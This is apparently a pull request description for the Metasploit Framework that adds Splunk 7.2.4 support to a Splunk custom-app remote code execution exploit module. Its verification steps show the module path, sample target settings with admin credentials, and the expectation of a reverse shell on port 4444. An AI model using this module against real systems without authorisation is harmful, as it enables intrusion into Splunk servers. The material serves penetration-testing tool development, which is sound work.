rapid7/metasploit-framework
# Add support for splunk 7.2.4 to 'Splunk Custom App Remote Code Execution'

Hi
I have been working on integrating some changes to the 'Splunk Custom App Remote Code Execution' and including support for splunk 7.2.4 (it might even work on the whole 7 train up to 7.2.4)

## Verification steps

List the steps needed to make sure this thing works

- [ ] `use exploit/multi/http/splunk_upload_app_exec`
- [ ] set required variables (you will need admin credentials)
`SET TARGET 1`
`SET RHOST 192.168.1.1`
`SET USERNAME admin`
`SET PASSWORD changeme`
- [ ] 'run' or 'exploit' and you should expect reverse shell connection on port 4444

It has been tested successfully on both linux,macos (windows does not support python reverse shell but all the other available commands are working as expected)
